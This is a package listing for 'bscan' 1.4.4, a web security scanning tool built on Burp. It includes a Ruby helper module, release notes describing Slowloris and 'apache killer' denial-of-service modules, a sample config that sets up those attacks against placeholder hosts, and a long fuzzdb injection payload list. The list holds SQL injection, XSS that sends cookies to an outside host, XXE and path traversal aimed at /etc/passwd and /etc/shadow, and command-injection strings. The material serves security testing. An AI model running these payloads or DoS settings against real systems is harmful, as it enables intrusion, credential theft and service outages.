bscan 1.4.4
Sign up to get free protection for your applications and to get access to all the features.
- data/CONFIG.rdoc +131 -0
- data/README.rdoc +140 -0
- data/Rakefile +54 -0
- data/VERSION +1 -0
- data/bin/bscan +79 -0
- data/bscan.gemspec +63 -0
- data/lib/bscan.rb +324 -0
- data/lib/bscan/modules/injector.rb +142 -0
- data/lib/bscan/modules/kill_apache.rb +201 -0
- data/lib/bscan/modules/many_threads.rb +52 -0
- data/lib/bscan/modules/slowloris.rb +263 -0
- data/lib/bscan/utils/bscan_helper.rb +133 -0
- data/release_notes.txt +25 -0
- data/samples/config/big_request.txt +12 -0
- data/samples/config/conf +58 -0
- data/samples/config/injector.txt +514 -0
- data/samples/config/request.txt +12 -0
- data/samples/headless-bscan.sh +3 -0
- data/test.sh +3 -0
- data/test/bscan_test.rb +4 -0
- metadata +91 -0
@@ -0,0 +1,133 @@
|
|
1
|
+
module BscanHelper
|
2
|
+
class Issue
|
3
|
+
attr_accessor :issue_name
|
4
|
+
attr_accessor :url
|
5
|
+
attr_accessor :severity
|
6
|
+
attr_accessor :confidence
|
7
|
+
attr_accessor :issue_background
|
8
|
+
attr_accessor :issue_detail
|
9
|
+
attr_accessor :remediation_background
|
10
|
+
attr_accessor :http_messages
|
11
|
+
|
12
|
+
def initialize(n, u, sev, conf, req, rsp, id='', ib='', rb='')
|
13
|
+
@issue_name,@url,@severity,@confidence,@issue_background,@issue_detail,@remediation_background,@http_messages=
|
14
|
+
n,u,sev,conf,ib,id,rb,[Message.new(req,rsp)]
|
15
|
+
end
|
16
|
+
|
17
|
+
end
|
18
|
+
|
19
|
+
class Message
|
20
|
+
attr_accessor :req_str
|
21
|
+
attr_accessor :rsp_str
|
22
|
+
def initialize(req, rsp)
|
23
|
+
@req_str,@rsp_str = req,rsp
|
24
|
+
end
|
25
|
+
end
|
26
|
+
|
27
|
+
def prop nm
|
28
|
+
@prop_pref + nm
|
29
|
+
end
|
30
|
+
|
31
|
+
def search_path
|
32
|
+
path = []
|
33
|
+
path << File.expand_path('.') << File.expand_path(File.join('.','lib')) << File.expand_path(File.join('~','.bscan')) << File.expand_path(File.join('etc','bscan')) << $:
|
34
|
+
end
|
35
|
+
|
36
|
+
def search_path_file file
|
37
|
+
Pathname.new(file).absolute? ? [file] : search_path.map! {|p| File.join(p,file)}
|
38
|
+
end
|
39
|
+
|
40
|
+
def open_in_path file
|
41
|
+
io = nil
|
42
|
+
files = search_path_file(file)
|
43
|
+
files.each do |p|
|
44
|
+
io = File.open(p,"r") if File.file?(p)
|
45
|
+
return io if io
|
46
|
+
end
|
47
|
+
raise "Can't find file in: #{files.join(':')}"
|
48
|
+
end
|
49
|
+
|
50
|
+
def set_len r
|
51
|
+
mbody = r.match(/(\r?\n\r?\n)/)
|
52
|
+
body_pos = mbody.end(0)
|
53
|
+
r.sub!(/content-length\s*:\s*\d+/i, "Content-Length: "+(r.length-body_pos).to_s)
|
54
|
+
end
|
55
|
+
|
56
|
+
|
57
|
+
def do_scan msg, trg, inj
|
58
|
+
@bscan.activity[0]=true
|
59
|
+
@bscan.Log 2, "#{@mid}do_scan Scanning: #{trg}"
|
60
|
+
# msg.url = trg
|
61
|
+
path = $1 if trg =~ /\/\/[^\/]+(\/.*)/
|
62
|
+
path = '/' if (not path) or (path.length < 1)
|
63
|
+
req = msg.req_str.sub(/(GET|POST|)\s*(.+)\s*HTTP/, "\\1 #{path} HTTP")
|
64
|
+
|
65
|
+
send_req req, msg.getProtocol, inj
|
66
|
+
|
67
|
+
end
|
68
|
+
|
69
|
+
def get_url_host_port req,proto
|
70
|
+
host,port = $1.split(/\s*:\s*/,2) if req =~ /host\s*:\s*([^\s]+)\s*\r?\n/i
|
71
|
+
if not port
|
72
|
+
port = '80' if proto == 'http'
|
73
|
+
port = '443' if proto == 'https'
|
74
|
+
end
|
75
|
+
path = $2 if req =~/(GET|POST|)\s+(.+)\s+HTTP/
|
76
|
+
["#{proto}://#{host}:#{port}"+path,host,port.to_i]
|
77
|
+
end
|
78
|
+
|
79
|
+
def send_only req, proto, inj
|
80
|
+
begin
|
81
|
+
trg,host,port = get_url_host_port req,proto
|
82
|
+
https = proto == "https" ? true : false
|
83
|
+
start = Time.now
|
84
|
+
@bscan.Log 2, "#{@mid}send_req make_req: '#{trg}' '#{host}' '#{port}'\n#{req}"
|
85
|
+
rsp = @bscan.make_request(host, port, https, req)
|
86
|
+
rt = Time.now - start
|
87
|
+
return [rsp,rt,trg,host,port]
|
88
|
+
rescue Exception => e
|
89
|
+
@bscan.Log 0, "#{@mid}send_req Exception: #{e.message}"
|
90
|
+
@bscan.Log 0, e.backtrace.join("\n")
|
91
|
+
end
|
92
|
+
end
|
93
|
+
|
94
|
+
|
95
|
+
|
96
|
+
def send_req req, proto, inj
|
97
|
+
rsp,rt,trg,host,port = send_only req, proto, inj
|
98
|
+
https = proto == "https" ? true : false
|
99
|
+
if not @bscan.modules_only
|
100
|
+
@bscan.Log 2, "#{@mid}send_req do_passive: '#{trg}' '#{host}' '#{port}'\n#{req}\n#{rsp}"
|
101
|
+
@bscan.do_passive_scan(host, port, https, req, rsp)
|
102
|
+
end
|
103
|
+
verify_response trg, req, rsp, inj, rt
|
104
|
+
end
|
105
|
+
|
106
|
+
def esc exp
|
107
|
+
Regexp.escape exp
|
108
|
+
end
|
109
|
+
|
110
|
+
def verify_response u, req, rsp, inj, time
|
111
|
+
|
112
|
+
@bscan.Log 2, "#{@mid}verify_response: #{u} #{inj} #{time} #{req} #{rsp}"
|
113
|
+
|
114
|
+
st = $1 if rsp =~ /^\s*HTTP.*\s+(\d+)\s+/
|
115
|
+
st ||= '0'
|
116
|
+
st = st.to_i
|
117
|
+
issue = nil
|
118
|
+
if (st >= 500 and @config[prop('check_status')]=='true')
|
119
|
+
issue = Issue.new "#{@mid.chop}: Unexpected Error", u, "Medium", "Retest", req, rsp
|
120
|
+
end
|
121
|
+
mt = @config[prop('check_rsp_max_time')]
|
122
|
+
mt = mt.to_i if mt
|
123
|
+
if (mt and mt > 0 and time > mt)
|
124
|
+
issue = Issue.new "#{@mid.chop}: Long Response Time", u, "Medium", "Retest", req, rsp, "Response time is longer that #{mt}"
|
125
|
+
end
|
126
|
+
if (rsp =~ /#{esc(inj)}/ and @config[prop('check_replay')]=='true')
|
127
|
+
issue = Issue.new "#{@mid.chop}: Possible XSS", u, "High", "Retest", req, rsp, "The following input has been replayed in a response #{inj}"
|
128
|
+
end
|
129
|
+
|
130
|
+
@bscan.write_issue_state issue if issue
|
131
|
+
end
|
132
|
+
|
133
|
+
end
|
data/release_notes.txt
ADDED
@@ -0,0 +1,25 @@
|
|
1
|
+
== 1.4.4
|
2
|
+
* Added a module for apache killer (apache_killer.rb)
|
3
|
+
* Changed logging to use Java IO (Ruby's IO caused Java exceptions)
|
4
|
+
|
5
|
+
== 1.4.3
|
6
|
+
* Added a module for Slowloris attacks (slowloris.rb)
|
7
|
+
* Updated rdocs
|
8
|
+
* Added test.sh for local testing (run it from the prj root)
|
9
|
+
|
10
|
+
== 1.4.2
|
11
|
+
* Changed docs a bit and git repo location: ssh://gryb_info@git.code.sf.net/p/b-scan/trunk
|
12
|
+
|
13
|
+
== 1.4.1
|
14
|
+
* Added an important '--help config' option
|
15
|
+
|
16
|
+
== 1.4.0
|
17
|
+
|
18
|
+
* A version is released!
|
19
|
+
|
20
|
+
* headless-bscan.sh - headless launcher example
|
21
|
+
* bscan - executable used by headless-bscan.sh
|
22
|
+
* bscan.rb - BScan main class
|
23
|
+
* injector.rb - external module that injects malicious patterns (e.g. form fuzzdb)
|
24
|
+
to URL params and body
|
25
|
+
* many_threads.rb - external module that rpeats a request from multiple threads
|
@@ -0,0 +1,12 @@
|
|
1
|
+
POST /?q=something HTTP/1.1^M
|
2
|
+
Host: target.one.com:80^M
|
3
|
+
Accept: */*^M
|
4
|
+
Accept-Language: en^M
|
5
|
+
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)^M
|
6
|
+
Connection: close^M
|
7
|
+
Referer: http://asol.selfip.com/p^M
|
8
|
+
Content-Type: application/x-www-form-urlencoded^M
|
9
|
+
Content-Length: 14^M
|
10
|
+
Cookie: JSESSIONID=583A7E5D1FE791D694BBAA1ACC10EBB8^M
|
11
|
+
^M
|
12
|
+
foo=^^^null^^^10
|
data/samples/config/conf
ADDED
@@ -0,0 +1,58 @@
|
|
1
|
+
# BScan settings
|
2
|
+
bscan.inactivity_to=300
|
3
|
+
bscan.issues=issues
|
4
|
+
bscan.modules_only=true
|
5
|
+
#bscan.modules=bscan/modules/injector.rb:one,bscan/modules/injector.rb:two,bscan/modules/injector.rb:three,bscan/modules/many_threads.rb
|
6
|
+
bscan.modules=bscan/modules/slowloris.rb
|
7
|
+
bscan.url=http://target.one.com/path/?param=val
|
8
|
+
bscan.url=http://target.two.com/path/?param=val
|
9
|
+
|
10
|
+
#KillApache settings
|
11
|
+
bscan.kill_apache.hostport=target.one.com:443
|
12
|
+
bscan.kill_apache.protocol=https
|
13
|
+
bscan.kill_apache.threads=500
|
14
|
+
bscan.kill_apache.response_time_factor=5
|
15
|
+
bscan.kill_apache.req_per_thread=1
|
16
|
+
bscan.kill_apache.read_timeout=10
|
17
|
+
bscan.kill_apache.range_nbr=500
|
18
|
+
bscan.kill_apache.static_request=true
|
19
|
+
|
20
|
+
|
21
|
+
|
22
|
+
#Slowloris settings: port is mandatory in 'hostport' param
|
23
|
+
bscan.slowloris.hostport=target.three.com:443
|
24
|
+
bscan.slowloris.protocol=https
|
25
|
+
bscan.slowloris.method=POST
|
26
|
+
bscan.slowloris.threads=25
|
27
|
+
bscan.slowloris.response_time_factor=5
|
28
|
+
bscan.slowloris.sleep_time=200
|
29
|
+
bscan.slowloris.con_nbr_per_thread=50
|
30
|
+
bscan.slowloris.pack_per_con=10
|
31
|
+
bscan.slowloris.static_request=true
|
32
|
+
|
33
|
+
|
34
|
+
# Injector settings
|
35
|
+
bscan.injector.one.file=samples/config/injector.txt
|
36
|
+
bscan.injector.one.inject_to_body=true
|
37
|
+
bscan.injector.one.check_rsp_max_time=1
|
38
|
+
bscan.injector.one.check_status=true
|
39
|
+
bscan.injector.one.check_replay=true
|
40
|
+
bscan.injector.two.file=samples/config/injector.txt
|
41
|
+
bscan.injector.two.rsp_max_time=2
|
42
|
+
bscan.injector.three.file=samples/config/injector.txt
|
43
|
+
bscan.injector.three.inject_to_body=true
|
44
|
+
bscan.injector.three.inject_instead_of=^^^:samples/config/request.txt:http
|
45
|
+
bscan.injector.three.static_request=true
|
46
|
+
bscan.injector.three.check_replay=true
|
47
|
+
|
48
|
+
# Many threads settings
|
49
|
+
bscan.many_threads.request=samples/config/big_request.txt:http:^^^
|
50
|
+
bscan.many_threads.threads=7
|
51
|
+
bscan.injector.two.rsp_max_time=2
|
52
|
+
bscan.many_threads.static_request=true
|
53
|
+
|
54
|
+
# Burp settings
|
55
|
+
scanner.testSQLinjectionboolean=true
|
56
|
+
scanner.numthreads=10
|
57
|
+
proxy.interceptrequests=false
|
58
|
+
intruder.numattackthreads=10
|
@@ -0,0 +1,514 @@
|
|
1
|
+
<xss_check>
|
2
|
+
# All injections below are taken from Google's fuzzdb: http://code.google.com/p/fuzzdb/
|
3
|
+
!
|
4
|
+
!'
|
5
|
+
!@#$%%^#$%#$@#$%$$@#$%^^**(()
|
6
|
+
!@#0%^#0##018387@#0^^**(()
|
7
|
+
"
|
8
|
+
" or "a"="a
|
9
|
+
" or "x"="x
|
10
|
+
" or 0=0 #
|
11
|
+
" or 0=0 --
|
12
|
+
" or 1=1 or ""="
|
13
|
+
" or 1=1--
|
14
|
+
"' or 1 --'"
|
15
|
+
") or ("a"="a
|
16
|
+
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"
|
17
|
+
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
|
18
|
+
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[' or 1=1 or ''=']]></foo>"
|
19
|
+
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"
|
20
|
+
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
|
21
|
+
"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
|
22
|
+
"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
|
23
|
+
"><script>"
|
24
|
+
"><script>alert(1)</script>
|
25
|
+
"><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie</script>
|
26
|
+
">xxx<P>yyy
|
27
|
+
"\t"
|
28
|
+
#
|
29
|
+
#'
|
30
|
+
#'
|
31
|
+
#xA
|
32
|
+
#xA#xD
|
33
|
+
#xD
|
34
|
+
#xD#xA
|
35
|
+
$NULL
|
36
|
+
$null
|
37
|
+
%
|
38
|
+
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
|
39
|
+
%00
|
40
|
+
%00../../../../../../etc/passwd
|
41
|
+
%00../../../../../../etc/shadow
|
42
|
+
%00/
|
43
|
+
%00/etc/passwd%00
|
44
|
+
%01%02%03%04%0a%0d%0aADSF
|
45
|
+
%08x
|
46
|
+
%0A/usr/bin/id
|
47
|
+
%0A/usr/bin/id%0A
|
48
|
+
%0Aid
|
49
|
+
%0Aid%0A
|
50
|
+
%0a ping -i 30 127.0.0.1 %0a
|
51
|
+
%oa ping -n 30 127.0.0.1 %0a
|
52
|
+
%0a id %0a
|
53
|
+
%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+<youremail>%0aRCPT+TO:+<youremail>%0aDATA%0aFrom:+<youremail>%0aTo:+<youremail>%0aSubject:+tst%0afoo%0a%2e%0a
|
54
|
+
%0d
|
55
|
+
%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+<youremail>%0d%0aRCPT+TO:+<youremail>%0d%0aDATA%0d%0aFrom:+<youremail>%0d%0aTo:+<youremail>%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a
|
56
|
+
%0d%0aX-Injection-Header:%20AttackValue
|
57
|
+
%20
|
58
|
+
%20$(sleep%2050)
|
59
|
+
%20'sleep%2050'
|
60
|
+
%20d
|
61
|
+
%20n
|
62
|
+
%20s
|
63
|
+
%20x
|
64
|
+
%20|
|
65
|
+
%21
|
66
|
+
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
|
67
|
+
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini
|
68
|
+
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00
|
69
|
+
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
|
70
|
+
%2500
|
71
|
+
%250a
|
72
|
+
%26
|
73
|
+
%27%20or%201=1
|
74
|
+
%28
|
75
|
+
%29
|
76
|
+
%2A
|
77
|
+
%2A%28%7C%28mail%3D%2A%29%29
|
78
|
+
%2A%28%7C%28objectclass%3D%2A%29%29
|
79
|
+
%2A%7C
|
80
|
+
%2C
|
81
|
+
%2e%2e%2f
|
82
|
+
%3C
|
83
|
+
%3C%3F
|
84
|
+
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
|
85
|
+
%3cscript%3ealert("XSS");%3c/script%3e
|
86
|
+
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
|
87
|
+
%5C
|
88
|
+
%5C/
|
89
|
+
%60
|
90
|
+
%7C
|
91
|
+
%7f
|
92
|
+
%99999999999s
|
93
|
+
%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A
|
94
|
+
%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E
|
95
|
+
%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F
|
96
|
+
%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G
|
97
|
+
%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X
|
98
|
+
%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a
|
99
|
+
%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d
|
100
|
+
%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e
|
101
|
+
%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f
|
102
|
+
%ff
|
103
|
+
%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g
|
104
|
+
%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i
|
105
|
+
%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o
|
106
|
+
%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
|
107
|
+
%s%p%x%d
|
108
|
+
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
|
109
|
+
%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u
|
110
|
+
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
|
111
|
+
&
|
112
|
+
& id
|
113
|
+
& ping -i 30 127.0.0.1 &
|
114
|
+
& ping -n 30 127.0.0.1 &
|
115
|
+
<
|
116
|
+
<
|
117
|
+
<
|
118
|
+
<
|
119
|
+
<
|
120
|
+
<
|
121
|
+
<
|
122
|
+
<
|
123
|
+
<
|
124
|
+
<
|
125
|
+
|
126
|
+
|
127
|
+
|
128
|
+
|
129
|
+
<
|
130
|
+
<
|
131
|
+
<
|
132
|
+
<
|
133
|
+
<
|
134
|
+
<
|
135
|
+
<
|
136
|
+
<
|
137
|
+
<
|
138
|
+
<
|
139
|
+
<
|
140
|
+
<
|
141
|
+
<
|
142
|
+
<
|
143
|
+
<
|
144
|
+
<
|
145
|
+
<
|
146
|
+
<
|
147
|
+
<
|
148
|
+
<
|
149
|
+
<
|
150
|
+
<
|
151
|
+
<
|
152
|
+
<
|
153
|
+
<
|
154
|
+
<
|
155
|
+
<
|
156
|
+
<
|
157
|
+
<
|
158
|
+
<
|
159
|
+
<
|
160
|
+
<
|
161
|
+
<
|
162
|
+
<
|
163
|
+
<
|
164
|
+
<
|
165
|
+
<
|
166
|
+
<
|
167
|
+
<
|
168
|
+
<
|
169
|
+
<
|
170
|
+
<
|
171
|
+
<
|
172
|
+
<
|
173
|
+
<
|
174
|
+
<
|
175
|
+
<
|
176
|
+
<
|
177
|
+
<
|
178
|
+
<
|
179
|
+
<
|
180
|
+
<
|
181
|
+
'
|
182
|
+
'%20OR
|
183
|
+
&id
|
184
|
+
<
|
185
|
+
<
|
186
|
+
<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
|
187
|
+
<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
|
188
|
+
<!--#exec%20cmd="/usr/bin/id;-->
|
189
|
+
<>"'%;)(&+
|
190
|
+
<script>alert(document.cookie);<script>alert
|
191
|
+
<script>alert(document.cookie);</script>
|
192
|
+
";id"
|
193
|
+
'
|
194
|
+
' (select top 1
|
195
|
+
' --
|
196
|
+
' ;
|
197
|
+
' UNION ALL SELECT
|
198
|
+
' UNION SELECT
|
199
|
+
' or ''='
|
200
|
+
' or '1'='1
|
201
|
+
' or '1'='1'--
|
202
|
+
' or 'x'='x
|
203
|
+
' or (EXISTS)
|
204
|
+
' or 0=0 #
|
205
|
+
' or 0=0 --
|
206
|
+
' or 1 in (@@version)--
|
207
|
+
' or 1=1 or ''='
|
208
|
+
' or 1=1--
|
209
|
+
' or a=a--
|
210
|
+
' or uid like '%
|
211
|
+
' or uname like '%
|
212
|
+
' or user like '%
|
213
|
+
' or userid like '%
|
214
|
+
' or username like '%
|
215
|
+
'%20or%201=1
|
216
|
+
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
|
217
|
+
'';!--"<XSS>=&{()}
|
218
|
+
') or ('a'='a
|
219
|
+
'--
|
220
|
+
'; exec master..xp_cmdshell
|
221
|
+
'; exec xp_regread
|
222
|
+
'; waitfor delay '0:30:0'--
|
223
|
+
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
|
224
|
+
';shutdown--
|
225
|
+
'><script>alert(document.cookie);</script>
|
226
|
+
'><script>alert(document.cookie)</script>
|
227
|
+
'hi' or 'x'='x';
|
228
|
+
'or select *
|
229
|
+
'sqlattempt1
|
230
|
+
'||UTL_HTTP.REQUEST
|
231
|
+
'||Utl_Http.request('http://<yourservername>') from dual--
|
232
|
+
(
|
233
|
+
(')
|
234
|
+
(sqlattempt2)
|
235
|
+
)
|
236
|
+
))))))))))
|
237
|
+
*
|
238
|
+
*'
|
239
|
+
*'
|
240
|
+
*(|(mail=*))
|
241
|
+
*(|(objectclass=*))
|
242
|
+
*/*
|
243
|
+
*|
|
244
|
+
+
|
245
|
+
+%00
|
246
|
+
,@variable
|
247
|
+
-
|
248
|
+
--
|
249
|
+
--';
|
250
|
+
--sp_password
|
251
|
+
-1
|
252
|
+
-1.0
|
253
|
+
-2
|
254
|
+
-20
|
255
|
+
-268435455
|
256
|
+
..%%35%63
|
257
|
+
..%%35c
|
258
|
+
..%25%35%63
|
259
|
+
..%255c
|
260
|
+
..%5c
|
261
|
+
..%bg%qf
|
262
|
+
..%c0%af
|
263
|
+
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
|
264
|
+
..%u2215
|
265
|
+
..%u2216
|
266
|
+
../
|
267
|
+
../../../../../../../../../../../../etc/hosts
|
268
|
+
../../../../../../../../../../../../etc/hosts%00
|
269
|
+
../../../../../../../../../../../../etc/passwd
|
270
|
+
../../../../../../../../../../../../etc/passwd%00
|
271
|
+
../../../../../../../../../../../../etc/shadow
|
272
|
+
../../../../../../../../../../../../etc/shadow%00
|
273
|
+
..\
|
274
|
+
..\..\..\..\..\..\..\..\..\..\etc\passwd
|
275
|
+
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
|
276
|
+
..\..\..\..\..\..\..\..\..\..\etc\shadow
|
277
|
+
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
|
278
|
+
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
|
279
|
+
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
|
280
|
+
/
|
281
|
+
/%00/
|
282
|
+
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
|
283
|
+
/%2A
|
284
|
+
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
|
285
|
+
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
|
286
|
+
/'
|
287
|
+
/'
|
288
|
+
/,%ENV,/
|
289
|
+
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
|
290
|
+
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
|
291
|
+
/.../.../.../.../.../
|
292
|
+
/../../../../../../../../%2A
|
293
|
+
/../../../../../../../../../../../etc/passwd%00.html
|
294
|
+
/../../../../../../../../../../../etc/passwd%00.jpg
|
295
|
+
/../../../../../../../../../../etc/passwd
|
296
|
+
/../../../../../../../../../../etc/passwd^^
|
297
|
+
/../../../../../../../../../../etc/shadow
|
298
|
+
/../../../../../../../../../../etc/shadow^^
|
299
|
+
/../../../../../../../../bin/id|
|
300
|
+
/..\../..\../..\../..\../..\../..\../boot.ini
|
301
|
+
/..\../..\../..\../..\../..\../..\../etc/passwd
|
302
|
+
/..\../..\../..\../..\../..\../..\../etc/shadow
|
303
|
+
/./././././././././././etc/passwd
|
304
|
+
/./././././././././././etc/shadow
|
305
|
+
//
|
306
|
+
//*
|
307
|
+
/etc/passwd
|
308
|
+
/etc/shadow
|
309
|
+
/index.html|id|
|
310
|
+
0
|
311
|
+
0 or 1=1
|
312
|
+
00
|
313
|
+
0xfffffff
|
314
|
+
1
|
315
|
+
1 or 1 in (@@version)--
|
316
|
+
1 or 1=1--
|
317
|
+
1.0
|
318
|
+
1; waitfor delay '0:30:0'--
|
319
|
+
1;SELECT%20*
|
320
|
+
1||Utl_Http.request('http://<yourservername>') from dual--
|
321
|
+
2
|
322
|
+
2147483647
|
323
|
+
268435455
|
324
|
+
65536
|
325
|
+
:response.write 111111
|
326
|
+
;
|
327
|
+
; ping 127.0.0.1 ;
|
328
|
+
;/usr/bin/id\n
|
329
|
+
;echo 111111
|
330
|
+
;id
|
331
|
+
;id;
|
332
|
+
;id\n
|
333
|
+
;id|
|
334
|
+
;ls -la
|
335
|
+
;system('/usr/bin/id')
|
336
|
+
;system('cat%20/etc/passwd')
|
337
|
+
;system('id')
|
338
|
+
;|/usr/bin/id|
|
339
|
+
<
|
340
|
+
< script > < / script>
|
341
|
+
<!
|
342
|
+
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
|
343
|
+
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
|
344
|
+
</foo>
|
345
|
+
<<
|
346
|
+
<<<
|
347
|
+
<<script>alert("XSS");//<</script>
|
348
|
+
<>"'%;)(&+
|
349
|
+
<?
|
350
|
+
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>
|
351
|
+
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo>
|
352
|
+
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo>
|
353
|
+
